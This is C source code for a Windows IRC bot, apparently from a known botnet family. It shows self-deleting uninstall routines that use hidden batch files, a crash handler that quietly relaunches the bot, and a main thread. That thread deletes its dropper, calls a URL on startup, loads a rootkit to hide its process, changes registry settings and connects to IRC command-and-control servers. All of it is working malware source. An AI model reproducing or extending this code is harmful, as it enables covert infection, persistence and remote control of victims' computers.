void uninstall(BOOL thread/*=FALSE*/, BOOL difbot/*=FALSE*/) { #ifndef NO_SERVICE // Erase the service SC_HANDLE scm; SC_HANDLE service; scm = fOpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); service = fOpenService(scm, servicename, SERVICE_ALL_ACCESS); fDeleteService(service); #else // RegDelete(runkey.hkey,runkey.subkey,runkey.name); #endif ReleaseMutex(xetum); // release the mutex so it doesn't break the next bot if it uses the same one if (!thread) { // ^ so we don't kill the update thread or have the batch trying to erase the new bot // kill all threads killthreadall(); // start the batch to erase the bot EraseMe(); } return; }
EXCEPTION_DISPOSITION cdecl _except_handler(struct _EXCEPTION_RECORD *ExceptionRecord, void *EstablisherFrame,struct _CONTEXT *ContextRecord,void *DispatcherContext) { // do some clean-up fclosesocket(threads[0].sock); killthreadall(); fWSACleanup(); fWSACleanup(); Sleep(100); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&pinfo, 0, sizeof(pinfo)); memset(&sinfo, 0, sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; #ifdef DEBUG_CONSOLE sinfo.wShowWindow = SW_SHOW; #else sinfo.wShowWindow = SW_HIDE; #endif char botfile[MAX_PATH],sysdir[MAX_PATH]; GetSystemDirectory(sysdir, sizeof(sysdir)); GetModuleFileName(NULL, botfile, sizeof(botfile)); if (CreateProcess(NULL, botfile, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) { Sleep(100); CloseHandle(pinfo.hProcess); CloseHandle(pinfo.hThread); } // Change EAX in the context record so that it points to someplace // where we can successfully write ContextRecord->Eax = (DWORD)&scratch; _asm { // Remove our EXECEPTION_REGISTRATION record mov eax,[ESP] // Get pointer to previous record mov FS:[0], EAX // Install previous record add esp, 8 // Clean our EXECEPTION_REGISTRATION off stack } ExitProcess(0); // Tell the OS to restart the faulting instruction return ExceptionContinueExecution; }
void uninstall(void) { char buffer[1024], cmdline[MAX_PATH], botfile[MAX_PATH], batfile[MAX_PATH]; if ((AutoStart) && !(noadvapi32)) AutoStartRegs(); killthreadall(); GetTempPath(sizeof(buffer), buffer); sprintf(batfile, "%sdel.bat", buffer); HANDLE f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); if (f > (HANDLE)0) { DWORD r; sprintf(buffer,"@echo off\r\n" ":repeat\r\n" "del \"%%1\"\r\n" "if exist \"%%1\" goto repeat\r\n" "del \"%s\"", batfile); WriteFile(f, buffer, strlen(buffer), &r, NULL); CloseHandle(f); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&pinfo, 0, sizeof(pinfo)); memset(&sinfo, 0, sizeof(sinfo)); sinfo.lpTitle = ""; sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; GetModuleFileName(GetModuleHandle(NULL), botfile, sizeof(botfile)); if (GetFileAttributes(botfile) != INVALID_FILE_ATTRIBUTES) SetFileAttributes(botfile,FILE_ATTRIBUTE_NORMAL); sprintf(buffer, "%%comspec%% /c %s %s", batfile, botfile); ExpandEnvironmentStrings(buffer, cmdline, sizeof(cmdline)); CreateProcess(NULL, cmdline, NULL, NULL, TRUE, BELOW_NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo); } return; }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }